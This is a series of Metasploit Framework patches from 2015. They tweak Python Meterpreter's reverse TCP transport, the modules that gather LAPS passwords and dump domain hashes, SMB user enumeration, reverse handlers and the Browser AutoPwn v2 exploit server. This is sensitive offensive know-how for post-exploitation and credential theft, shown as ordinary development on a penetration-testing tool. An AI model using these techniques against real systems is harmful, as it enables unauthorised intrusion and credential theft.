From c4875a88219cc3b917246d17440b7d052b49848c Mon Sep 17 00:00:00 2001
From: root <void-in@users.noreply.github.com>
Date: Thu, 2 Jul 2015 11:38:37 +0500
Subject: [PATCH 0625/1013] Change sysinfo to sys.config.sysinfo

---
 lib/msf/base/sessions/meterpreter.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/lib/msf/base/sessions/meterpreter.rb b/lib/msf/base/sessions/meterpreter.rb
index a389c66a9f..a2c031f93a 100644
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -375,9 +375,9 @@ class Meterpreter < Rex::Post::Meterpreter::Client
             :host => self,
             :workspace => wspace,
             :data => {
-              :name => sysinfo["Computer"],
-              :os => sysinfo["OS"],
-              :arch => sysinfo["Architecture"],
+              :name => sys.config.sysinfo["Computer"],
+              :os => sys.config.sysinfo["OS"],
+              :arch => sys.config.sysinfo["Architecture"],
             }
           })
 

From 8a3873d730bb16ba8c3eba4425a39878d0f41f1c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Thu, 2 Jul 2015 09:53:08 +0100
Subject: [PATCH 0626/1013] Tweak filter to reduce empty results

---
 modules/post/windows/gather/credentials/enum_laps.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/enum_laps.rb b/modules/post/windows/gather/credentials/enum_laps.rb
index ccbe8dc996..c2d6e418dc 100644
--- a/modules/post/windows/gather/credentials/enum_laps.rb
+++ b/modules/post/windows/gather/credentials/enum_laps.rb
@@ -39,7 +39,7 @@ class Metasploit3 < Msf::Post
       OptString.new('LOCAL_ADMIN_NAME', [true, 'The username to store the password against', 'Administrator']),
       OptBool.new('STORE_DB', [true, 'Store file in loot.', false]),
       OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]),
-      OptString.new('FILTER', [true, 'Search filter.', '(objectCategory=Computer)'])
+      OptString.new('FILTER', [true, 'Search filter.', '(&(objectCategory=Computer)(ms-MCS-AdmPwd=*))'])
     ], self.class)
 
     deregister_options('FIELDS')

From dfa71a2b44baf9f5786b0a1e205f53ed0bc32e86 Mon Sep 17 00:00:00 2001
From: Josh Abraham <jabra@spl0it.org>
Date: Thu, 2 Jul 2015 08:22:21 -0400
Subject: [PATCH 0627/1013] update to store creds using the new method

---
 .../scanner/smb/smb_enumusers_domain.rb          | 16 +++++++++-------
 1 file changed, 9 insertions(+), 7 deletions(-)

diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
index 250b2b9cf0..7a9a5fb1f7 100644
--- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
+++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb
@@ -154,13 +154,15 @@ class Metasploit3 < Msf::Auxiliary
           end
 
           print_good("#{ip} - Found user: #{comp_user}")
-          report_note(
-            :host => ip,
-            :proto  => 'tcp',
-            :port => rport,
-            :type => 'smb_loggedin_users',
-            :data => { :user => comp_user },
-            :update => :unique_data
+          credential_core =  create_credential(
+            origin_type: :service,
+            address: ip,
+            port: rport,
+            service_name: 'smb',
+            protocol: 'tcp',
+            module_fullname: self.fullname,
+            workspace_id: myworkspace.id,
+            username: comp_user
           )
         end
 

From dbe239bc750cf5a921f018dbb6f284b7fac8dd76 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 2 Jul 2015 08:23:02 -0400
Subject: [PATCH 0628/1013] Pymet fix transport next and prev for one transport

---
 data/meterpreter/meterpreter.py | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 30aa8dba1b..99c76d38a7 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -715,8 +715,6 @@ class PythonMeterpreter(object):
 		return time.time() > self.session_expiry_end
 
 	def transport_change(self, new_transport=None):
-		if new_transport == self.transport:
-			return
 		if new_transport is None:
 			new_transport = self.transport_next()
 		self.transport.deactivate()
@@ -898,13 +896,19 @@ class PythonMeterpreter(object):
 		return ERROR_SUCCESS, response
 
 	def _core_transport_next(self, request, response):
+		new_transport = self.transport_next()
+		if new_transport == self.transport:
+			return ERROR_FAILURE, response
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
-		self.transport_change(self.transport_next())
+		self.transport_change(new_transport)
 		return None
 
 	def _core_transport_prev(self, request, response):
+		new_transport = self.transport_prev()
+		if new_transport == self.transport:
+			return ERROR_FAILURE, response
 		self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
-		self.transport_change(self.transport_prev())
+		self.transport_change(new_transport)
 		return None
 
 	def _core_transport_remove(self, request, response):

From 6ab7c314de1d21ad2c9adfcdf588d83c2dccbd89 Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 2 Jul 2015 08:33:11 -0400
Subject: [PATCH 0629/1013] Pymet fix reverse_tcp transport for IPv6 addresses

---
 data/meterpreter/meterpreter.py | 17 ++++++-----------
 1 file changed, 6 insertions(+), 11 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index 99c76d38a7..c923e70d76 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -574,12 +574,7 @@ class TcpTransport(Transport):
 		sock.close()
 
 	def _activate(self):
-		if self.url.startswith('tcp:'):
-			family = socket.AF_INET
-			address, port = self.url[6:].split(':', 1)
-		else:
-			family = socket.AF_INET6
-			address, port = self.url[7:].split(':', 1)
+		address, port = self.url[6:].rsplit(':', 1)
 		port = int(port.rstrip('/'))
 		timeout = max(self.communication_timeout, 30)
 		if address in ('', '0.0.0.0', '::'):
@@ -596,7 +591,10 @@ class TcpTransport(Transport):
 			sock, _ = server_sock.accept()
 			server_sock.close()
 		else:
-			sock = socket.socket(family, socket.SOCK_STREAM)
+			if ':' in address:
+				sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
+			else:
+				sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 			sock.settimeout(timeout)
 			sock.connect((address, port))
 			sock.settimeout(None)
@@ -637,10 +635,7 @@ class TcpTransport(Transport):
 
 	@classmethod
 	def from_socket(cls, sock):
-		if sock.family == socket.AF_INET:
-			url = 'tcp://'
-		else:
-			url = 'tcp6://'
+		url = 'tcp://'
 		address, port = sock.getsockname()[:2]
 		# this will need to be changed if the bind stager ever supports binding to a specific address
 		if not address in ('', '0.0.0.0', '::'):

From 841fbddfc6f4a9e8c30015173537f04077f8c77a Mon Sep 17 00:00:00 2001
From: Spencer McIntyre <zeroSteiner@gmail.com>
Date: Thu, 2 Jul 2015 11:51:53 -0400
Subject: [PATCH 0630/1013] Pymet fix packet polling interval

---
 data/meterpreter/meterpreter.py | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py
index c923e70d76..61aeb7db7d 100644
--- a/data/meterpreter/meterpreter.py
+++ b/data/meterpreter/meterpreter.py
@@ -463,14 +463,14 @@ class Transport(object):
 		return True
 
 	def get_packet(self):
+		self.communication_active = False
 		try:
 			pkt = self._get_packet()
 		except:
-			self.communication_active = False
 			return None
+		self.communication_last = time.time()
 		if pkt:
 			self.communication_active = True
-			self.communication_last = time.time()
 		return pkt
 
 	def send_packet(self, pkt):
@@ -611,7 +611,7 @@ class TcpTransport(Transport):
 		packet = None
 		first = self._first_packet
 		self._first_packet = False
-		if select.select([self.socket], [], [], max(self.communication_timeout, 0.5))[0]:
+		if select.select([self.socket], [], [], 0.5)[0]:
 			packet = self.socket.recv(8)
 			if len(packet) != 8:
 				if first and len(packet) == 4:
@@ -738,7 +738,7 @@ class PythonMeterpreter(object):
 	def run(self):
 		while self.running and not self.session_has_expired:
 			request = None
-			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 1)
+			should_get_packet = self.transport.communication_active or ((time.time() - self.transport.communication_last) > 0.75)
 			if should_get_packet:
 				request = self.get_packet()
 			if request:

From 42daf4d38bd58114d661d3d0b3b5c9d2551b903b Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Thu, 2 Jul 2015 11:52:02 -0500
Subject: [PATCH 0631/1013] fix up ordering of pre-checks

i hate early returns, but we need to bail out early
if some of these checks fail

MSP-12867
---
 .../gather/credentials/domain_hashdump.rb       | 17 ++++++-----------
 1 file changed, 6 insertions(+), 11 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 18f3f7487b..968258fb42 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -93,23 +93,18 @@ class Metasploit3 < Msf::Post
 
 
   def preconditions_met?
-    status = true
-    unless is_domain_controller?
-      print_error "This does not appear to be an AD Domain Controller"
-      status = false
-    end
     unless is_admin?
       print_error "This module requires Admin privs to run"
-      status = false
+      return false
     end
-    if is_uac_enabled?
-      print_error "This module requires UAC to be bypassed first"
-      status = false
+    unless is_domain_controller?
+      print_error "This does not appear to be an AD Domain Controller"
+      return false
     end
     unless session_compat?
-      status = false
+      return false
     end
-    return status
+    return true
   end
 
   def repair_ntds(path='')

From 87e63257379b45953b2883c96ee6e0f79b7fbb33 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 12:10:21 -0500
Subject: [PATCH 0632/1013] Revert BAPv2 changes to
 framework/libraries/handlers

---
 lib/msf/core/exploit/http/server.rb           |  6 ++--
 lib/msf/core/exploit/tcp_server.rb            |  6 ++--
 lib/msf/core/handler/reverse_tcp.rb           |  5 ++--
 lib/msf/core/handler/reverse_tcp_double.rb    | 28 ++++++++-----------
 .../core/handler/reverse_tcp_double_ssl.rb    |  4 +--
 lib/msf/ui/console/command_dispatcher/core.rb | 19 +++----------
 modules/exploits/multi/handler.rb             |  4 +--
 7 files changed, 23 insertions(+), 49 deletions(-)

diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index baae927866..6b58eb8a4a 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -217,12 +217,10 @@ module Exploit::Remote::HttpServer
       print_status("Intentionally using insecure SSL compression. Your operating system might not respect this!")
     end
 
-    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-      print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
-    end
 
+    print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
 
-    if opts['ServerHost'] == '0.0.0.0' && datastore['MODULEOWNER'] != Msf::Exploit::Remote::BrowserAutopwnv2
+    if opts['ServerHost'] == '0.0.0.0'
       print_status("Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
     end
 
diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb
index 3a84cf38c9..771a1bad6b 100644
--- a/lib/msf/core/exploit/tcp_server.rb
+++ b/lib/msf/core/exploit/tcp_server.rb
@@ -47,9 +47,7 @@ module Exploit::Remote::TcpServer
   def exploit
 
     start_service()
-    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-      print_status("Server started.")
-    end
+    print_status("Server started.")
 
     # Call the exploit primer
     primer
@@ -71,7 +69,7 @@ module Exploit::Remote::TcpServer
     super
     if(service)
       stop_service()
-      print_status("Server stopped.") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+      print_status("Server stopped.")
     end
   end
 
diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb
index dcfcd69983..ab0b30dd7e 100644
--- a/lib/msf/core/handler/reverse_tcp.rb
+++ b/lib/msf/core/handler/reverse_tcp.rb
@@ -108,9 +108,8 @@ module ReverseTcp
         else
           via = ""
         end
-        unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-          print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
-        end
+
+        print_status("Started reverse handler on #{ip}:#{local_port} #{via}")
         break
       rescue
         ex = $!
diff --git a/lib/msf/core/handler/reverse_tcp_double.rb b/lib/msf/core/handler/reverse_tcp_double.rb
index 71d5673974..af0730f3c5 100644
--- a/lib/msf/core/handler/reverse_tcp_double.rb
+++ b/lib/msf/core/handler/reverse_tcp_double.rb
@@ -95,22 +95,16 @@ module ReverseTcpDouble
       sock_inp = nil
       sock_out = nil
 
-      unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-        print_status("Started reverse double handler")
-      end
+      print_status("Started reverse double handler")
 
       begin
         # Accept two client connection
         begin
           client_a = self.listener_sock.accept
-          unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-            print_status("Accepted the first client connection...")
-          end
+          print_status("Accepted the first client connection...")
 
           client_b = self.listener_sock.accept
-          unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-            print_status("Accepted the second client connection...")
-          end
+          print_status("Accepted the second client connection...")
         rescue
           wlog("Exception raised during listener accept: #{$!}\n\n#{$@.join("\n")}")
           return nil
@@ -153,35 +147,35 @@ module ReverseTcpDouble
 
       print_status("Command: #{echo.strip}")
 
-      print_status("Writing to socket A") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+      print_status("Writing to socket A")
       sock_a.put(echo)
 
-      print_status("Writing to socket B") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+      print_status("Writing to socket B")
       sock_b.put(echo)
 
-      print_status("Reading from sockets...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+      print_status("Reading from sockets...")
 
       resp_a = ''
       resp_b = ''
 
       if (sock_a.has_read_data?(1))
-        print_status("Reading from socket A") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+        print_status("Reading from socket A")
         resp_a = sock_a.get_once
         print_status("A: #{resp_a.inspect}")
       end
 
       if (sock_b.has_read_data?(1))
-        print_status("Reading from socket B") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+        print_status("Reading from socket B")
         resp_b = sock_b.get_once
         print_status("B: #{resp_b.inspect}")
       end
 
-      print_status("Matching...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+      print_status("Matching...")
       if (resp_b.match(etag))
-        print_status("A is input...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+        print_status("A is input...")
         return sock_a, sock_b
       else
-        print_status("B is input...") unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
+        print_status("B is input...")
         return sock_b, sock_a
       end
 
diff --git a/lib/msf/core/handler/reverse_tcp_double_ssl.rb b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
index 6d7c89d913..d6650f5264 100644
--- a/lib/msf/core/handler/reverse_tcp_double_ssl.rb
+++ b/lib/msf/core/handler/reverse_tcp_double_ssl.rb
@@ -105,9 +105,7 @@ module ReverseTcpDoubleSSL
           via = ""
         end
 
-        unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-          print_status("Started reverse double SSL handler on #{ip}:#{local_port} #{via}")
-        end
+        print_status("Started reverse double SSL handler on #{ip}:#{local_port} #{via}")
         break
       rescue
         ex = $!
diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb
index 91acdab3bb..6ce3e89de2 100644
--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1986,12 +1986,6 @@ class Core
   # Sets a name to a value in a context aware environment.
   #
   def cmd_set(*args)
-    # Special-case Browser AutoPwn because set payload can only set one payload, but BAP can
-    # do multiple. So let BAP handle this.
-    if args[0] && args[0].upcase == 'PAYLOAD' && active_module.kind_of?(Msf::Exploit::Remote::BrowserAutopwnv2) && active_module.respond_to?(:set_payload)
-      active_module.set_payload
-      return
-    end
 
     # Figure out if these are global variables
     global = false
@@ -2083,6 +2077,7 @@ class Core
   # at least 1 when tab completion has reached this stage since the command itself has been completed
 
   def cmd_set_tabs(str, words)
+
     # A value has already been specified
     return [] if words.length > 2
 
@@ -3353,15 +3348,9 @@ class Core
     mod_opt = Serializer::ReadableText.dump_options(mod, '   ')
     print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0)
 
-    # We have to special-case browser autopwn because BAP is an exploit module that allows having
-    # multiple payloads, but normally MSF can't do this, so it will have be handled by the BAP
-    # mixin.
-    # For other normal cases, if it's still an exploit and a payload is defined, then just go ahead
-    # create it, and then display the payload options.
-    if mod.exploit? and mod.kind_of?(Msf::Exploit::Remote::BrowserAutopwnv2) and mod.respond_to?(:show_payloads)
-      # #show_payloads should be defined by BrowserAutoPwn
-      mod.show_payloads
-    elsif (mod.exploit? and mod.datastore['PAYLOAD'])
+    # If it's an exploit and a payload is defined, create it and
+    # display the payload's options
+    if (mod.exploit? and mod.datastore['PAYLOAD'])
       p = framework.payloads.create(mod.datastore['PAYLOAD'])
 
       if (!p)
diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb
index 26cfb0529b..1c4f635b8e 100644
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@@ -49,9 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     stime = Time.now.to_f
-    unless datastore['MODULEOWNER'] == Msf::Exploit::Remote::BrowserAutopwnv2
-      print_status "Starting the payload handler..."
-    end
+    print_status "Starting the payload handler..."
     while(true)
       break if session_created? and datastore['ExitOnSession']
       break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )

From b9a83081384a0bb573e034d82bfa7ddaf0985486 Mon Sep 17 00:00:00 2001
From: HD Moore <hd_moore@rapid7.com>
Date: Thu, 2 Jul 2015 12:53:24 -0500
Subject: [PATCH 0633/1013] Replace BAP profiles with a framework-instance hash

---
 lib/msf/core/exploit/browser_autopwnv2.rb     |  72 +++-----
 .../exploit/remote/browser_exploit_server.rb  |  26 +--
 .../exploit/remote/browser_profile_manager.rb |  66 ++------
 .../remote/browser_profile_manager_spec.rb    | 158 ------------------
 4 files changed, 53 insertions(+), 269 deletions(-)
 delete mode 100644 spec/lib/msf/core/exploit/remote/browser_profile_manager_spec.rb

diff --git a/lib/msf/core/exploit/browser_autopwnv2.rb b/lib/msf/core/exploit/browser_autopwnv2.rb
index 48d321bd27..8ff4e76c5b 100644
--- a/lib/msf/core/exploit/browser_autopwnv2.rb
+++ b/lib/msf/core/exploit/browser_autopwnv2.rb
@@ -63,55 +63,25 @@ module Msf
           next
         end
         if mod.kind_of?(Msf::Exploit::Remote::BrowserExploitServer)
-          
+
           @bap_exploits << mod
         end
       end
     end
 
 
-    # Returns a note type that's unique to this BAP (based on a timestamp).
-    # This overrides Msf::Exploit::Remote::BrowserProfileManager#note_type_prefix so that BAP
+    # Returns a prefix type that's unique to this BAP (based on a timestamp & module uuid).
+    # This overrides Msf::Exploit::Remote::BrowserProfileManager#browser_profile_prefix so that BAP
     # and all of its child exploits can share target information with each other. If BAP is active
     # but there are other standalone BES exploits running, this allows them not to use (or cleanup)
-    # each other's data. Also, once requested, the method will not generate another note type prefix
-    # again, it will just return whatever's been stored in the @note_type_prefix instance variable.
+    # each other's data. Also, once requested, the method will not generate another profile prefix
+    # again, it will just return whatever's been stored in the @browser_profile_prefix instance variable.
     #
     # @return [String]
-    def note_type_prefix
-      @note_type_prefix ||= "BAP.#{Time.now.to_i}.Client"
+    def browser_profile_prefix
+      @browser_profile_prefix ||= "BAP.#{Time.now.to_i}.#{self.module_uuid}"
     end
 
-
-    # Removes target information from the framework database owned by this BAP.
-    # If the user is not connected to the database, then no cleanup action.
-    #
-    # @return [void]
-    def rm_target_info_notes
-      return unless framework.db.active
-      retries = 0
-      begin
-        ::ActiveRecord::Base.connection_pool.with_connection {
-          framework.db.notes.each do |note|
-            note.destroy if note.ntype.include?(note_type_prefix)
-          end
-        }
-      rescue NameError => e
-        # Very rarely, framework.db.notes triggers uninitialized constant Mdm::Workspace::Mdm::Note.
-        # Not sure why, it's been really difficult to reproduce. But the uninitialized constant error
-        # is raised by the compute_type method in inheritance.rb from active_record, so we'll just
-        # rescue that and retry a couple of times.
-        if retries < 10
-          retry
-        else
-          print_error("Unable to properly cleanup notes. Try doing it manually: notes -d")
-          elog("(BAP notes cleanup) #{e.class} #{e.message}\n#{e.backtrace * "\n"}")
-        end
-        retries += 1
-      end
-    end
-
-
     # Removes background exploit jobs that belong to BAP.
     #
     # @return [void]
@@ -132,14 +102,14 @@ module Msf
     end
 
 
-    # Cleans up everything such as notes and jobs.
+    # Cleans up everything such as profiles and jobs.
     #
     # @see #rm_exploit_jobs The method for cleaning up jobs.
-    # @see #rm_target_info_notes The method for removing target information (found in db notes).
+    # @see #Msf::Exploit::Remote::BrowserProfileManager#clear_browser_profiles The method for removing target information.
     # @return [void]
     def cleanup
       super
-      rm_target_info_notes
+      clear_browser_profiles
       rm_exploit_jobs
       rm_payload_jobs
     end
@@ -168,9 +138,13 @@ module Msf
 
       # Set options only configurable by BAP.
       xploit.datastore['DisablePayloadHandler'] = true
-      xploit.datastore['NoteTypePrefix']        = note_type_prefix
+      xploit.datastore['BrowserProfilePrefix']  = browser_profile_prefix
       xploit.datastore['URIPATH']               = "/#{assign_module_resource}"
-      xploit.datastore['MODULEOWNER']           = Msf::Exploit::Remote::BrowserAutopwnv2
+
+      # TODO: Pass additional parameters
+      # TODO: Pass WORKSPACE and other options down to the sub module
+      # TODO: Add BAPv2 tracking information (?)
+      # TODO: Change exploit output options?
     end
 
 
@@ -179,6 +153,7 @@ module Msf
     # @param resource [String] The resource to check.
     # @return [TrueClass] Resource is taken.
     # @return [FalseClass] Resource is not taken.
+    # TODO: Prevent partial prefix match
     def is_resource_taken?(resource)
       taken = false
 
@@ -232,6 +207,7 @@ module Msf
     # @return [Hash] A hash with each module list sorted by disclosure date.
     def sort_date_in_group(bap_groups)
       bap_groups.each_pair do |ranking, module_list|
+        # TODO: Handle wonky dates in local modules better
         bap_groups[ranking] = module_list.sort_by {|m| Date.parse(m.disclosure_date.to_s)}.reverse
       end
     end
@@ -350,10 +326,14 @@ module Msf
         multi_handler.datastore['AutoRunScript']        = datastore['AutoRunScript'] if datastore['AutoRunScript']
         multi_handler.datastore['CAMPAIGN_ID']          = datastore['CAMPAIGN_ID'] if datastore['CAMPAIGN_ID']
 
+
+        # TODO: Pass WORKSPACE and other options down to the sub module
+
         # Configurable only by BAP
-        multi_handler.datastore['EXITONSESSION'] = false
+        multi_handler.datastore['ExitOnSession'] = false
         multi_handler.datastore['EXITFUNC']      = 'thread'
-        multi_handler.datastore['MODULEOWNER']   = Msf::Exploit::Remote::BrowserAutopwnv2
+
+        # TODO: BAPv2 specific options / tracking would go here
 
         # Now we're ready to start the handler
         multi_handler.exploit_simple(
@@ -616,7 +596,7 @@ module Msf
     def get_suitable_exploits(cli, request)
       current_exploit_list = []
       tag = retrieve_tag(cli, request)
-      profile_info = get_profile_info(tag)
+      profile_info = browser_profile[tag]
       bap_exploits.each do |m|
         if m.get_bad_requirements(profile_info).empty?
           current_exploit_list << m
@@ -831,4 +811,4 @@ module Msf
     end
 
   end
-end
\ No newline at end of file
+end
diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb
index 1340a1e9e7..bcd08b9426 100644
--- a/lib/msf/core/exploit/remote/browser_exploit_server.rb
+++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb
@@ -304,7 +304,9 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     def process_browser_info(source, cli, request)
       tag = retrieve_tag(cli, request)
-      update_profile(tag, :source, source.to_s)
+
+      browser_profile[tag] ||= {}
+      browser_profile[tag][:source] = source.to_s
 
       found_ua_name = ''
       found_ua_ver  = ''
@@ -314,8 +316,9 @@ module Msf
       when :script
         # Gathers target data from a POST request
         parsed_body = CGI::parse(Rex::Text.decode_base64(request.body) || '')
-        vprint_status("Received sniffed browser data over POST: \n#{parsed_body}.")
-        parsed_body.each { |k, v| update_profile(tag, k.to_s, v.first) }
+        vprint_status("Received sniffed browser data over POST:")
+        vprint_line("#{parsed_body}.")
+        parsed_body.each { |k, v| browser_profile[tag][k.to_s] = v.first }
         found_ua_name = parsed_body['ua_name']
         found_ua_ver = parsed_body['ua_ver']
 
@@ -327,15 +330,15 @@ module Msf
         # Kill this to save space.
         fp.delete(:ua_string)
         fp.each do |k, v|
-          update_profile(tag, k.to_s, v)
+          browser_profile[tag][k.to_s] = v
         end
         found_ua_name = fp[:ua_name]
         found_ua_ver = fp[:ua_ver]
       end
 
       # Other detections
-      update_profile(tag, :proxy, has_proxy?(request))
-      update_profile(tag, :language, request.headers['Accept-Language'] || '')
+      browser_profile[tag][:proxy] = has_proxy?(request)
+      browser_profile[tag][:language] = request.headers['Accept-Language'] || ''
 
       report_client({
         :host      => cli.peerhost,
@@ -438,12 +441,12 @@ module Msf
       |
     end
 
-    # @return [String] name of the tracking cookie
+    # @return [String] Name of the tracking cookie
     def cookie_name
       datastore['CookieName'] || DEFAULT_COOKIE_NAME
     end
 
-
+    # @return [String] HTTP header string for the tracking cookie
     def cookie_header(tag)
       cookie = "#{cookie_name}=#{tag};"
       if datastore['CookieExpiration'].present?
@@ -465,7 +468,7 @@ module Msf
         #
         # This is the information gathering stage
         #
-        unless get_profile_info(retrieve_tag(cli, request)).empty?
+        unless browser_profile[retrieve_tag(cli, request)].empty?
           send_redirect(cli, get_module_resource)
           return
         end
@@ -473,7 +476,6 @@ module Msf
         print_status("Gathering target information.")
         tag = Rex::Text.rand_text_alpha(rand(20) + 5)
         ua = request.headers['User-Agent'] || ''
-        init_profile(tag)
         print_status("Sending HTML response.")
         html = get_detection_html(ua)
         send_response(cli, html, {'Set-Cookie' => cookie_header(tag)})
@@ -501,7 +503,7 @@ module Msf
         #
         tag = retrieve_tag(cli, request)
         vprint_status("Serving exploit to user with tag #{tag}")
-        profile = get_profile_info(tag)
+        profile = browser_profile[tag]
         if profile.empty?
           print_status("Browsing directly to the exploit URL is forbidden.")
           send_not_found(cli)
@@ -509,7 +511,7 @@ module Msf
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
           send_not_found(cli)
         else
-          update_profile(tag, :tried, true)
+          profile[tag][:tried] = true
           vprint_status("Setting target \"#{tag}\" to :tried.")
           try_set_target(profile)
           bad_reqs = get_bad_requirements(profile)
diff --git a/lib/msf/core/exploit/remote/browser_profile_manager.rb b/lib/msf/core/exploit/remote/browser_profile_manager.rb
index 5e571ec6fe..08dd8d2d6a 100644
--- a/lib/msf/core/exploit/remote/browser_profile_manager.rb
+++ b/lib/msf/core/exploit/remote/browser_profile_manager.rb
@@ -1,66 +1,26 @@
-require 'msgpack'
-
 module Msf
   module Exploit::Remote::BrowserProfileManager
 
-    # @overload note_type_prefix
-    #  Sets the note type prefix to retrieve or load target information.
-    def note_type_prefix
-      raise NoMethodError, "A mixin that's using BrowserProfileManager should define note_type_prefix"
+    # @overload browser_profile_prefix
+    #  Sets the profile prefix to retrieve or load target information.
+    def browser_profile_prefix
+      raise NoMethodError, "A mixin that's using BrowserProfileManager should define browser_profile_prefix"
     end
 
-
-    # Returns profile information about a specific browser client.
+    # Storage backend for browser profiles
     #
-    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
     # @return [Hash]
-    def get_profile_info(tag)
-      normalized_tag = "#{note_type_prefix}.#{tag}"
-      framework.db.notes.each do |note|
-        return MessagePack.unpack(note.data) if note.ntype == normalized_tag 
-      end
-
-      {}
+    def browser_profile
+      framework[:browser_profiles] ||= {}
+      framework[:browser_profiles][browser_profile_prefix] ||= {}
+      framework[:browser_profiles][browser_profile_prefix]
     end
 
-
-    # Updates profile information about a specific browser client.
-    # It will also automatically initialize the profile (an empty one) if it's not found.
+    # Storage backend for browser profiles
     #
-    # @see #init_profile
-    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
-    # @param [String] key A specific key to update (for example: os name).
-    # @param [String] value The value for the key.
-    # @return [void]
-    def update_profile(tag, key, value)
-      profile = get_profile_info(tag)
-      if profile.empty?
-        init_profile(tag)
-        profile = get_profile_info(tag)
-      end
-
-      normalized_tag = "#{note_type_prefix}.#{tag}"
-      profile[normalized_tag][key.to_s] = value
-      framework.db.report_note(
-        :type => normalized_tag,
-        :data => profile.to_msgpack,
-        :update => :unique
-      )
-    end
-
-
-    # Initializes a profile.
-    #
-    # @param [String] tag A tag that's unique to the browser. Probably generated by Msf::Exploit::Remote::BrowserExploitServer#retrieve_tag.
-    # @return [void]
-    def init_profile(tag)
-      normalized_tag = "#{note_type_prefix}.#{tag}"
-      empty_profile = { normalized_tag => {} }
-      framework.db.report_note(
-        :type => normalized_tag,
-        :data => empty_profile.to_msgpack,
-        :update => :unique
-      )
